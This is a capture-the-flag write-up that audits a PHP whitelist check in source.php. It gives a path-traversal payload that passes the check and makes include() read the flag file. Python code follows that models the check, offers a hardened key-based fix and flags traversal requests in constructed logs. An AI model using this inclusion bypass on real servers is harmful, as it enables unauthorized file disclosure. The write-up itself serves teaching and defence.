The page opens with a smiley face. Viewing the source gives the hint source.php; opening it reveals the code:
```php
<?php
highlight_file(__FILE__);
class emmm {
    public static function checkFile(&$page) {
        $whitelist = ["source" => "source.php", "hint" => "hint.php"];
        if (!isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // 1. exact match against the whitelist values
        if (in_array($page, $whitelist)) {
            return true;
        }
        // 2. keep only the part before the first '?', then match again
        $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // 3. urldecode() first, then repeat the prefix check
        $_page = urldecode($page);
        $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
if (!empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) {
    include $_REQUEST['file'];   // includes the raw parameter, not the validated prefix
    exit;
} else {
    echo "";   // the image markup rendered here was lost when the page was extracted
}
```
Code audit
Start with the main body at the bottom: it is a file inclusion. The `file` parameter must be non-empty, must be a string, and must pass checkFile(), which is a whitelist check.
Looking at the code above, there is also a hint.php; opening it shows `flag not here, and flag in ffffllllaaaagggg`, which names the flag file.
```php
if (in_array($page, $whitelist))   // $page must be in the whitelist, so only source or hint
$_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));   // mb_strpos returns the position of the first '?'; mb_substr keeps the part before it
if (in_array($_page, $whitelist))  // check whether that prefix is source or hint
    return true;
```
The key is this section: once the prefix before the `?` satisfies the whitelist, checkFile() returns true, but include still receives the full original string, so the remainder of the value is free to traverse directories.
?file=source.php?/../../../../ffffllllaaaagggg then yields the flag.
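To make the audit concrete from the defender's side, here is an added example (not code from the challenge or its author): a Python model of the three branches of emmm::checkFile(), a hardened lookup that resolves the request value as a whitelist key so that user input never reaches include, and a small check over constructed access-log lines that flags a `file=` value containing a `..` segment. The whitelist values and the flag filename are taken from the page; the log lines, IP address and timestamps are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Whitelist exactly as in source.php; everything else in this file is an added model.
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def vulnerable_check(page):
    """Python model of emmm::checkFile(): True wherever the PHP returns true."""
    if not isinstance(page, str) or page == "":
        return False
    # branch 1: exact match against the whitelist values
    if page in WHITELIST.values():
        return True
    # branch 2: mb_substr($page, 0, mb_strpos($page . '?', '?')) keeps text before the first '?'
    if page.split("?", 1)[0] in WHITELIST.values():
        return True
    # branch 3: urldecode() first, then the same prefix check
    decoded = unquote_plus(page)
    return decoded.split("?", 1)[0] in WHITELIST.values()


def vulnerable_resolve(file_param):
    """What the challenge actually includes: the raw parameter, not the validated prefix."""
    if file_param and vulnerable_check(file_param):
        return file_param
    return None


def hardened_resolve(key):
    """Fix: treat the request value as a whitelist *key* and include the mapped filename.
    No prefix parsing, no decoding; a value that is not a key resolves to nothing."""
    if not isinstance(key, str):
        return None
    return WHITELIST.get(key)


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
DOTDOT_SEGMENT = re.compile(r'(^|[/\\])\.\.([/\\]|$)')


def flag_traversal_requests(log_lines):
    """Return request targets whose decoded file= parameter contains a '..' path segment."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        for value in parse_qs(urlsplit(target).query).get("file", []):
            # parse_qs decoded once; decode again to mirror the urldecode() branch
            if DOTDOT_SEGMENT.search(unquote_plus(value)):
                flagged.append(target)
                break
    return flagged


# Constructed access-log lines (placeholder client address and timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?file=source.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?file=hint.php HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=source.php?/../../../../ffffllllaaaagggg HTTP/1.1" 200 44',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /static/style.css HTTP/1.1" 200 1201',
]

if __name__ == "__main__":
    payload = "source.php?/../../../../ffffllllaaaagggg"
    print("vulnerable includes:", vulnerable_resolve(payload))
    print("hardened resolves  :", hardened_resolve(payload), "/", hardened_resolve("source"))
    print("flagged requests   :", flag_traversal_requests(SAMPLE_LOG))
```

The hardened resolver changes the contract of the parameter: the client sends `file=source` or `file=hint`, and the server chooses the filename, so there is no string in which a trailing `?/../` could survive validation. The log check runs the same prefix-then-decode view as the PHP does, which is why it decodes the parameter a second time before looking for a `..` segment.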